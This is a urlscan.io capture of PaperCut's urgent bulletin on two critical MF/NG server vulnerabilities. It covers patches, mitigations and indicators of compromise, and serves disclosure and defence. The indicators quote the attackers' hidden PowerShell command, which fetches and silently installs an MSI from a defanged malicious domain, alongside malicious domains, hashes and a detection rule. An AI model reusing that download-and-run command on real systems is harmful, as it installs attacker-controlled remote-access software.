www.papercut.com
Open in
urlscan Pro
34.95.115.145
Public Scan
Submitted URL: http://link.tps.es/ls/click?upn=tpIXezP47teQO-2B9SzogkTU1cNFNRdDwnXQu01UUjmNq9atAFO9Yiz0LGzDUNRGy4bk0Gx9zqwmzahTxq2...
Effective URL: https://www.papercut.com/kb/Main/PO-1216-and-PO-1219?utm_medium=email&utm_source=sharpspring&sslid=M7e0NDAzNDc3NTYzBgA&ss...
Submission: On April 26 via manual from US — Scanned from ES
Effective URL: https://www.papercut.com/kb/Main/PO-1216-and-PO-1219?utm_medium=email&utm_source=sharpspring&sslid=M7e0NDAzNDc3NTYzBgA&ss...
Submission: On April 26 via manual from US — Scanned from ES
Form analysis 1 forms found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/8186336/5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c
<form id="hsForm_5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/8186336/5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c"
class="hs-form-private hsForm_5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c hs-form-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c hs-form-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c_ba4f59e1-2a6f-4ec6-8603-bce4b18ada3a hs-form stacked"
target="target_iframe_5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" data-instance-id="ba4f59e1-2a6f-4ec6-8603-bce4b18ada3a" data-form-id="5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" data-portal-id="8186336">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" class="" placeholder="Enter your Email address" for="email-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c"><span>Email
address</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_amplitude_device_id hs-amplitude_device_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-amplitude_device_id-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" class="" placeholder="Enter your Amplitude Device ID"
for="amplitude_device_id-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c"><span>Amplitude Device ID</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="amplitude_device_id" class="hs-input" type="hidden" value=""></div>
</div>
<div class="legal-consent-container">
<div>
<div class="hs-dependent-field">
<div class="hs_LEGAL_CONSENT.subscription_type_20660050 hs-LEGAL_CONSENT.subscription_type_20660050 hs-fieldtype-booleancheckbox field hs-form-field">
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input">
<ul class="inputs-list" required="">
<li class="hs-form-booleancheckbox"><label for="LEGAL_CONSENT.subscription_type_20660050-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" class="hs-form-booleancheckbox-display"><input
id="LEGAL_CONSENT.subscription_type_20660050-5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" class="hs-input" type="checkbox" name="LEGAL_CONSENT.subscription_type_20660050" value="true"><span>
<p>Yes, subscribe me to PaperCut news, offers, product updates, newsletters and events.</p><span class="hs-form-required">*</span>
</span></label></li>
</ul>
</div>
</div>
</div>
<legend class="hs-field-desc checkbox-desc" style="display: none;"></legend>
</div>
<div class="hs-richtext">
<p>By filling out and submitting this form, you agree that you have read our <a href="https://www.papercut.com/privacy-policy/" target="_blank">Privacy Policy</a>, and agree to PaperCut handling your data in accordance with its terms.</p>
</div>
</div>
<div class="hs_recaptcha hs-recaptcha field hs-form-field">
<div class="input">
<div class="grecaptcha-badge" data-style="inline" style="width: 256px; height: 60px; box-shadow: gray 0px 0px 5px;">
<div class="grecaptcha-logo"><iframe title="reCAPTCHA"
src="https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6Ld_ad8ZAAAAAAqr0ePo1dUfAi0m4KPkCMQYwPPm&co=aHR0cHM6Ly93d3cucGFwZXJjdXQuY29tOjQ0Mw..&hl=en&v=4PnKmGB9wRHh1i04o7YUICeI&size=invisible&badge=inline&cb=a98irjedv4by"
width="256" height="60" role="presentation" name="a-l8vbmenyif2i" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"></iframe>
</div>
<div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
</div><iframe style="display: none;"></iframe>
</div><input type="hidden" name="g-recaptcha-response" id="hs-recaptcha-response" value="">
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1682524048309","formDefinitionUpdatedAt":"1656987395546","lang":"en","legalConsentOptions":"{\"communicationConsentCheckboxes\":[{\"communicationTypeId\":20660050,\"label\":\"<p>Yes, subscribe me to PaperCut news, offers, product updates, newsletters and events.</p>\",\"required\":true}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"<p>By filling out and submitting this form, you agree that you have read our <a href=\\\"https://www.papercut.com/privacy-policy/\\\" target=\\\"_blank\\\">Privacy Policy</a>, and agree to PaperCut handling your data in accordance with its terms.</p>\",\"processingConsentCheckboxLabel\":\"<p>Yes, subscribe me to PaperCut news, offers, product updates, newsletters and events.</p>\",\"isLegitimateInterest\":false}","embedType":"REGULAR","clonedFromForm":"525b820a-c332-44a2-b743-cfacfa396ead","renderRawHtml":"true","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36","pageTitle":"URGENT | PaperCut MF/NG vulnerability bulletin (March 2023) | PaperCut","pageUrl":"https://www.papercut.com/kb/Main/PO-1216-and-PO-1219?utm_medium=email&utm_source=sharpspring&sslid=M7e0NDAzNDc3NTYzBgA&sseid=MzI1MbAwNzSzMAYA&jobid=eac7339d-43f5-4215-b045-189d7776a6cc","urlParams":{"utm_medium":"email","utm_source":"sharpspring","sslid":"M7e0NDAzNDc3NTYzBgA","sseid":"MzI1MbAwNzSzMAYA","jobid":"eac7339d-43f5-4215-b045-189d7776a6cc"},"isHubSpotCmsGeneratedPage":false,"hutk":"9716d4a6153ffd82301c83e6183b5cbe","__hsfp":2397838929,"__hssc":"154692263.1.1682524050147","__hstc":"154692263.9716d4a6153ffd82301c83e6183b5cbe.1682524050147.1682524050147.1682524050147.1","formTarget":"#hbspt-form-ba4f59e1-2a6f-4ec6-8603-bce4b18ada3a","boolCheckBoxFields":"LEGAL_CONSENT.subscription_type_20660050","locale":"en","timestamp":1682524050159,"originalEmbedContext":{"portalId":"8186336","formId":"5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c","region":"na1","target":"#hbspt-form-ba4f59e1-2a6f-4ec6-8603-bce4b18ada3a","isBuilder":false,"isTestPage":false,"isPreview":false,"isMobileResponsive":true},"correlationId":"ba4f59e1-2a6f-4ec6-8603-bce4b18ada3a","renderedFieldsIds":["email","amplitude_device_id","LEGAL_CONSENT.subscription_type_20660050"],"captchaStatus":"LOADED","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.3102","sourceName":"forms-embed","sourceVersion":"1.3102","sourceVersionMajor":"1","sourceVersionMinor":"3102","_debug_allPageIds":{},"_debug_embedLogLines":[{"clientTimestamp":1682524048565,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"URGENT | PaperCut MF/NG vulnerability bulletin (March 2023) | PaperCut\",\"pageUrl\":\"https://www.papercut.com/kb/Main/PO-1216-and-PO-1219?utm_medium=email&utm_source=sharpspring&sslid=M7e0NDAzNDc3NTYzBgA&sseid=MzI1MbAwNzSzMAYA&jobid=eac7339d-43f5-4215-b045-189d7776a6cc\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36\",\"urlParams\":{\"utm_medium\":\"email\",\"utm_source\":\"sharpspring\",\"sslid\":\"M7e0NDAzNDc3NTYzBgA\",\"sseid\":\"MzI1MbAwNzSzMAYA\",\"jobid\":\"eac7339d-43f5-4215-b045-189d7776a6cc\"},\"isHubSpotCmsGeneratedPage\":false}"},{"clientTimestamp":1682524048566,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"ES\""},{"clientTimestamp":1682524050155,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"9716d4a6153ffd82301c83e6183b5cbe\"}"}]}"><iframe
name="target_iframe_5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c" style="display: none;"></iframe>
</form>Text Content
Hey there! We use cookies. They let us personalize content, track usage, and
analyze data on our end to improve your experience. To learn more about the
different cookies we’re using, check out our Privacy Policy.
If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.
Cookies settings
ACCEPT DECLINE
Skip to content
Find your dream job at PaperCut
Language
Choose your language
* No results
* Global (English)
* Français (Français)
* España (Español)
* Deutschland (Deutsche)
* Suomi (Suomalainen)
* Italia (Italiano)
* Nederland (Nederlands)
* Portugal (Português)
* Россия (Pусский)
* Sverige (Svenska)
* Bolivia (Español)
* Brazil (Português)
* Colombia (Español)
* Ecuador (Español)
* El Salvador (Español)
* República Dominicana (Español)
* Guatemala (Español)
* Honduras (Español)
* Mexico (Español)
* Nicaragua (Español)
* Panamá (Español)
* Paraguay (Español)
* Peru (Español)
* Uruguay (Español)
* Venezuela (Español)
* 简体中文
* 繁體中文
* 日本 (日本語)
* ประเทศไทย (ไทย)
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
Login
Choose your login
* No results
* PaperCut Hive
* PaperCut Pocket
* Partner Portal
* Students / Teachers
*
*
*
*
Contact
Contact us
* No results
* Sales
* Support
*
*
Search
Software
Our products
* PaperCut MF
Powerful print management server for printers and MFDs
* PaperCut Hive
Complete cloud-native print management for business
* PaperCut NG
DIY print management server for everyone
* PaperCut Pocket
Cloud print management solution for businesses with simple needs.
* Compare features
Sustainability
* PaperCut Grows
Grow your sustainability story.
Free tools
* PaperCut Mobility Print
A free Google Cloud Print alternative
* PaperCut QRdoc
The power of digital documents – on paper
* PaperCut Views
Real-time print analytics, insights and forecasts
Beta
* In the percolator
Popular Features
* Print rooms
Track and manage all your printing activity
* Forest Positive Printing
Go further than waste reduction
* Print Deploy
Print queues made easy
* Microsoft Universal Print
Take control of your Universal Print environment
Learn more about papercut grows
Solutions
For industries
* High School / K-12
Protect student information, cut costs, reduce waste
* Higher Education
Scale printing capabilities for your students and faculty
* Healthcare
Safeguard patient information with compliance features
* Local Government
Reduce budget spend while increasing compliance
* Legal
Secure confidential client info and assign costs
* Small to medium business
Grow your business while reducing costs
* Large Enterprise
Protect your systems, information, and future growth
* Coworking
Empower your clients to self-serve print, copy and scan
* Life Sciences
Protect your intellectual property and reduce your costs
What our customers say
“Sustainability is very important to Google nowadays,” says Ofer. “So the idea
that we could literally save paper on printing was appealing to us from the
get-go.”
Ofer Bar-Zakai, Google, US
* Customer Stories
100 million delighted users and counting. Read their stories
* Testimonials
Quotes written by our own customers
Learn more about papercut grows
Resources
Discover everything we do
* Overview
Explore all our products, and find real-world examples
* Easy printing
We’ve simplified printing for you and your end-users
* Print security
Achieve significant IT security wins right at the printer
* Cloud and print
Review our full suite of management solutiosn for cloud
* Waste control
Explore why this should be important to everyone
* Scanning
We’ve made scanning easier and more secure
* Integrations
Have a look at the largest collection of integrations
* Best Practices
Sharing our years of experience with you
Have a read
* Blog
Read our latest news in tech, product updates, and more
* Reports and White Papers
Reports, White Papers, Case Studies, Ebooks and more
Support
* Overview
* Help Center
* Manuals
* Knowledge base
* Known issues
* FAQs
Learn more about papercut grows
Software
Our products
* PaperCut MF
Powerful print management server for printers and MFDs
* PaperCut Hive
Complete cloud-native print management for business
* PaperCut NG
DIY print management server for everyone
* PaperCut Pocket
Cloud print management solution for businesses with simple needs.
* Compare features
Sustainability
* PaperCut Grows
Grow your sustainability story.
Free tools
* PaperCut Mobility Print
A free Google Cloud Print alternative
* PaperCut QRdoc
The power of digital documents – on paper
* PaperCut Views
Real-time print analytics, insights and forecasts
Beta
* In the percolator
Popular Features
* Print rooms
Track and manage all your printing activity
* Forest Positive Printing
Go further than waste reduction
* Print Deploy
Print queues made easy
* Microsoft Universal Print
Take control of your Universal Print environment
Learn more about papercut grows
Solutions
For industries
* High School / K-12
Protect student information, cut costs, reduce waste
* Higher Education
Scale printing capabilities for your students and faculty
* Healthcare
Safeguard patient information with compliance features
* Local Government
Reduce budget spend while increasing compliance
* Legal
Secure confidential client info and assign costs
* Small to medium business
Grow your business while reducing costs
* Large Enterprise
Protect your systems, information, and future growth
* Coworking
Empower your clients to self-serve print, copy and scan
* Life Sciences
Protect your intellectual property and reduce your costs
What our customers say
“Sustainability is very important to Google nowadays,” says Ofer. “So the idea
that we could literally save paper on printing was appealing to us from the
get-go.”
Ofer Bar-Zakai, Google, US
* Customer Stories
100 million delighted users and counting. Read their stories
* Testimonials
Quotes written by our own customers
Learn more about papercut grows
Resources
Discover everything we do
* Overview
Explore all our products, and find real-world examples
* Easy printing
We’ve simplified printing for you and your end-users
* Print security
Achieve significant IT security wins right at the printer
* Cloud and print
Review our full suite of management solutiosn for cloud
* Waste control
Explore why this should be important to everyone
* Scanning
We’ve made scanning easier and more secure
* Integrations
Have a look at the largest collection of integrations
* Best Practices
Sharing our years of experience with you
Have a read
* Blog
Read our latest news in tech, product updates, and more
* Reports and White Papers
Reports, White Papers, Case Studies, Ebooks and more
Support
* Overview
* Help Center
* Manuals
* Knowledge base
* Known issues
* FAQs
Learn more about papercut grows
CONTACT SALES
* Help Center home
* Knowledge Base
* KB Home
* FAQs
* How-to articles
* Reference
* Troubleshooting
* Known Issues
* Sales and Licensing
* End-user articles
* Product manuals
* PaperCut NG and MF
* PaperCut Pocket and Hive
* Mobility Print
* Job Ticketing
* Print Deploy
* Release notes
* PaperCut MF release notes
* PaperCut NG release notes
* System requirements
* PaperCut NG
* PaperCut MF
* PaperCut Pocket and Hive
* Search
* Support
1. Home
2. Support
3. Knowledge base
4. URGENT | PaperCut MF/NG vulnerability bulletin (March 2023)
URGENT | PAPERCUT MF/NG VULNERABILITY BULLETIN (MARCH 2023)
This page will continue to be updated as new information becomes available. Last
updated: 25 April 12.00 AEST.
We have received two vulnerability reports from a 3rd party cyber security
company (Trend Micro), for high/critical severity security issues in PaperCut
MF/NG. We have evidence to suggest that unpatched servers are being exploited in
the wild.
As a precaution, we are not able to reveal too much about these vulnerabilities.
We have documented what we can disclose below.
Critical: Please note that as of 18th April, 2023 (see “When was the exploit
first detected in the wild?” in the FAQs) we have evidence to suggest that
unpatched servers are being exploited in the wild, (particularly ZDI-CAN-18987 /
PO-1216).
Our immediate advice is to upgrade your PaperCut Application Servers to one of
the fixed versions listed below if you haven’t already.
If you suspect that your server has been compromised, we recommend taking server
backups, then wiping the Application Server, and rebuilding the Application
Server and restoring the database from a ‘safe’ backup point prior to when you
discovered any suspicious behavior. We have also updated the FAQ “How do I know
if my server has been exploited?” question below.
Important: Both of these vulnerabilities have been fixed in PaperCut MF and
PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later. We highly recommend
upgrading to one of these versions containing the fix (see the Where can I get
the upgrade? question below).
ZDI-CAN-18987 / PO-1216
(also identified as CVE-2023–27350)
We have confirmed that under certain circumstances this allows for an
unauthenticated attacker to get Remote Code Execution (RCE) on a PaperCut
Application Server. This could be done remotely and without the need to log in.
This vulnerability has been rated with a CVSS score of 9.8.
ZDI-CAN-19226 / PO-1219
(also identified as CVE-2023–27351)
We have confirmed that under certain circumstances this allows for an
unauthenticated attacker to potentially pull information about a user stored
within PaperCut MF or NG - including usernames, full names, email addresses,
office/department info and any card numbers associated with the user. The
attacker can also retrieve the hashed passwords for internal PaperCut-created
users only (note that this does not include any password hashes for users sync’d
from directory sources such as Microsoft 365 / Google Workspace / Active
Directory and others). This could be done remotely and without the need to log
in. We do not have any evidence of this vulnerability being used against
customers at this point.
This vulnerability has been rated with a CVSS score of 8.2.
PRODUCT STATUS AND NEXT STEPS
Which PaperCut products are impacted, and what are the actions required?
ZDI-CAN-18987 / PO-1216
CVE-2023–27350ZDI-CAN-19226 / PO-1219
CVE-2023–27351 What versions are
impacted?PaperCut MF or NG version 8.0 or later, on all OS platformsPaperCut MF
or NG version 15.0 or later, on all OS platforms Which PaperCut MF or NG
components are impacted?Application Servers are impacted
Site Servers are impactedApplication Servers are impacted Which PaperCut
components or products are NOT impacted?PaperCut MF/NG secondary servers (Print
Providers).
PaperCut MF/NG Direct Print Monitors (Print Providers).
PaperCut Hive.
PaperCut Pocket.
Print Deploy.
Mobility Print.
PaperCut User Client software.
PaperCut Multiverse.
Print Logger.PaperCut MF/NG secondary servers (Print Providers).
PaperCut MF/NG Direct Print Monitors (Print Providers).
PaperCut MF/NG site servers.
PaperCut Hive.
PaperCut Pocket.
Print Deploy.
Mobility Print.
PaperCut User Client software.
PaperCut Multiverse.
Print Logger. Next stepsWe recommend that you upgrade all Application Servers
and Site Servers (see Upgrade documentation)
You will not need to patch Secondary Servers (Print Providers / Direct Print
Monitors) - but you can if you prefer.We recommend that you upgrade all
Application Servers and Site Servers (see Upgrade documentation). Even though
the Site Server is not impacted by this vulnerability, you will need to upgrade
them to match the version number of the Application Server.
You will not need to patch Secondary Servers (Print Providers / Direct Print
Monitors) - but you can if you prefer.
FAQS
Q Where can I get the upgrade?
Please follow your usual upgrade procedure. Additional links on the ‘Check for
updates’ page (accessed through the Admin interface > About > Version info >
Check for updates) will allow customers to download fixes for previous major
versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the
current version available.
If you are using PaperCut MF, we highly recommend following your regular upgrade
process. Your PaperCut partner or reseller information can also be found on the
‘About’ tab in the PaperCut admin interface.
Alternatively, get direct downloads from here. It’s easy to identify your
edition of PaperCut - you’ll see it on the About tab or by checking the footer
of your PaperCut admin login.
Q What products are impacted by these vulnerabilities?
See the ‘Which components are impacted’ or ‘Which components are not impacted’
rows in the table above for a detailed list.
Q What is PaperCut doing to assist customers?
PaperCut and its partner network has activated response teams to assist PaperCut
MF and NG customers. Our service desks are manned 24/7 via our support page.
The security response team at PaperCut has been working with external security
advisors to compile a list of unpatched PaperCut MF/NG servers that have ports
open on the public internet. In addition to our email and in-app announcements
to all customers, we’ve been using this list to proactively reach out to
potentially exposed customers via multiple means from Wednesday afternoon (AEST)
and are working 24/7 through the weekend.
Q When was the exploit first detected in the wild?
PaperCut received our first report from a customer of suspicious activity on
their PaperCut server on the 18th April at 03:30 AEST / 17th April 17:30 UTC.
PaperCut has conducted analysis on all customer reports, and the earliest
signature of suspicious activity on a customer server potentially linked to this
vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC
Q Is there any impact from applying the upgrade?
There should be no negative impact from applying these security fixes. No other
manual steps need to be taken.
Q Where are the release notes for these fixes?
You can see the release notes pages for PaperCut MF and NG which list all fixes
included per version:
* MF - 20.1.7, 21.2.11, 22.0.9
* NG - 20.1.7, 21.2.11, 22.0.9
Q What are the CVSS scores for these vulnerabilities?
Vulnerability: ZDI-CAN-18987 / PO-1216
* Score: 9.8 (Critical)
* Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability: ZDI-CAN-19226 / PO-1219
* Score: 8.2 (High)
* Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Q Is there more information available about these vulnerabilities?
Not at this time - to give customers a chance to upgrade, we are not releasing
further details about these vulnerabilities.
Trend Micro have also advised they will disclose further information (TBD) about
the vulnerability on 10th May 2023. For more information, see
https://www.zerodayinitiative.com/advisories/upcoming/ (filter on “PaperCut”).
Q If we can’t upgrade to security patch, what other options are there?
Particularly if you have an older application version that doesn’t have a minor
patch available, we highly recommend locking down network access to the
server(s).
* Block all inbound traffic from external IPs to the web management port (port
9191 and 9192 by default)
* Block all traffic inbound to the web management portal on the firewall to the
server. Note: this will prevent lateral movement from internal hosts but
management of the PaperCut service can only be performed on that asset.
* Apply “Allow list” restrictions under Options > Advanced > Security > Allowed
site server IP addresses. Set this to only allow the IP addresses of verified
Site Servers on your network. Note this only addresses ZDI-CAN-19226 /
PO-1219
Q How do I know if my server has been exploited?
We currently recommend looking for the following Indicators of Compromise to
determine if it is likely that the vulnerability has been used to install
malware on the system. Depending on your systems, logging and endpoint
protection software you may be able to detect the following.
* If your security software has raised any alerts or warnings
* If you see suspicious PaperCut MF application log entries, ie:
* User “admin” logs into the administration interface
* Admin user “admin” modified the print script on the printer
* User “admin” updated the config key “…”
* User “[setup-wizard]” modified a config key
* Domains in DNS or web proxy logs:
* upd488[.]windowservicecemter[.]com/download/ld.txt
* upd488[.]windowservicecemter[.]com/download/AppPrint.msi
* upd488[.]windowservicecemter[.]com/download/a2.msi
* upd488[.]windowservicecemter[.]com/download/a3.msi
* anydeskupdate[.]com
* anydeskupdates[.]com
* netviewremote[.]com
* updateservicecenter[.]com
* windowcsupdates[.]com
* windowservicecentar[.]com
* windowservicecenter[.]com
* winserverupdates[.]com
* SHA256 hashes of files on local system:
* setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb
* ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
* Powershell Scripts having similar content to:
```
cmd /c “powershell.exe -nop -w hidden
Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’
-OutFile ‘setup.msi’ ”
cmd /c “msiexec /i setup.msi /qn IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1”\\@@
```
* Detection via YARA Rule on SIEM:
```
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: “\\pc-app.exe”
Image|endswith:
- “\\cmd.exe”
- “\\powershell.exe”
condition: selection
level: high
falsepositives:
- Expected admin activity
```
If you suspect that your server has been compromised, we recommend taking server
backups, then wiping the Application Server, and rebuilding the Application
Server and restoring the database from a ‘safe’ backup point prior to when you
discovered any suspicious behavior.
We will update this question with more details as we find more information from
our customer base and security community.
Q Is there a maintenance release for versions 19 or older?
No - versions 19 and older are now “end of life”, as documented on our End of
Life Policy page.
We recommend purchasing an updated license, which you can do online if you’re
using PaperCut NG, or through your PaperCut Partner if you’re using PaperCut MF.
You can find your PaperCut Partner contact information through the ‘About’ or
‘Help’ tab in the PaperCut administration interface.
Q I have a version 20 license, but no current M&S (maintenance and support) -
can I still get this fix?
Yes! As long as you are running a version which is currently supported (version
20 or later) you can upgrade to whichever maintenance release version you’re
licensed for. For example if you are licensed for version 20 but you don’t have
a valid license for version 21, you can update to version 20.1.7 as above. See
the ‘Where can I get the upgrade?’ question above for more details.
See our Upgrade Policy page for more information on licensing and upgrades.
ACKNOWLEDGEMENTS
PaperCut would like to thank the researchers working with Trend Micro for
reporting these issues and working with us to help protect our customers:
* ZDI-CAN-19226 - Discovered by: Piotr Bazydlo (@chudypb) of Trend Micro Zero
Day Initiative
* ZDI-CAN-18987 - Discovered by: Anonymous
* “Huntress” team members Joe Slowik, Caleb Stewart, Stuart Ashenbrenner, John
Hammond, Jason Phelps, Sharon Martin, Kris Luzadre, Matt Anderson and Dave
Kleinatland.
Trend Micro have also advised they will disclose further information (TBD) about
the vulnerability on 10th May 2023. For more information, see
https://www.zerodayinitiative.com/advisories/published/ (filter on “PaperCut”).
SECURITY NOTIFICATIONS
“How do I sign-up for paperCut’s security mailing list?”
In order to get timely notifications of security news (including security
related fixes or vulnerability information) please subscribe to our security
notifications list via our Security notifications sign-up form. If you’re a sys
admin or if you look after PaperCut product implementations at your
organization, this list will help you be amongst the first to hear of any
security related news or updates.
UPDATES
DateUpdate/Action 10th January 2023 (AEDT)Vulnerability reported to PaperCut, by
Trend Micro (see ZDI-CAN-18987 and ZDI-CAN-19226). 8th March 2023 (AEDT)Released
PaperCut MF and NG versions 20.1.7, 21.2.11 and 22.0.9 containing a fix for
these vulnerabilities.
Published this KB article documenting the vulnerability information.
Sent communications to PaperCut partners and PaperCut security notifications
email list. 14th March 2023 (AEDT)Trend Micro published additional details of
the vulnerability on their website: ZDI-CAN-18987 and ZDI-CAN-19226. 19th April
2023 (AEST)Updated this KB with new information discovered on the 18th April -
indicating evidence to suggest that unpatched servers are being exploited in the
wild. 20th April 2023 (AEST)Published RCE security exploit in PaperCut servers
blog post. 21st April 2023 (AEST)Added “If we can’t upgrade to security patch,
what other options are there?” (replaced the old “Is there a mitigation for
these vulnerabilities if I don’t want to upgrade?”)
Updated Acknowledgements section
Updated “How do I know if my server has been exploited?” 22nd April 2023
(AEST)Added new FAQ explaining what PaperCut has been doing to proactively
support PaperCut MF and NG customers.
Added new FAQ “When was the exploit first detected in the wild?” 23rd April 2023
(AEST)No new updates - continuing to proactively reach out to customers with
internet-facing servers. 24th April 2023 (AEST)Added direct download links to
‘Where can I get the upgrade’ 25th April 2023 (AEST)Clarified that Multiverse
and Print Logger are NOT impacted
Categories: FAQ, Security and Privacy
Keywords:
COMMENTS
Last updated Apr 25, 2023
Article history
Share Comment
* IN THIS PAGE
* Overview
* ZDI-CAN-18987 / PO-1216
* ZDI-CAN-19226 / PO-1219
* Product status and next steps
* FAQs
* Acknowledgements
* Security notifications
* Updates
FEATURED IN
WAS THIS PAGE HELPFUL?
Yes No
Subscribe to PaperCut communications
Email address*
Amplitude Device ID
* Yes, subscribe me to PaperCut news, offers, product updates, newsletters and
events.
*
By filling out and submitting this form, you agree that you have read our
Privacy Policy, and agree to PaperCut handling your data in accordance with its
terms.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of
Service apply.
Products
* Product Overview
* PaperCut NG
* PaperCut MF
* PaperCut Pocket
* PaperCut Hive
* Product comparison
Free Tools
* PaperCut Mobility Print
* PaperCut QRDoc
* PaperCut Views
Beta
* In the Percolator
Solutions for Industries
* Education overview
* High school/K-12
* Higher education
* Healthcare
* Co-working
* Life sciences
* Legal
* Small businesses
* Large enterprise
* Local government
What our customers say
* Customer Stories
* Testimonials
Discover
* Discover overview
* Easy printing
* Print security
* Cloud and Print
* Waste control
* Scanning
* Integrations
* Products at a Glance
* Best practices
* Forest Positive
Have a Read
* Blog
* Resources
Support
* Support Overview
Get PaperCut
* Contact Sales
About
* About us
* Meet the Team
* Careers
Misc
* Become a Reseller
* Privacy Policy
* Cookie Settings
PaperCut, the P symbol, and PaperCut products are trademarks of the PaperCut
group of companies.
© PaperCut Software Pty Ltd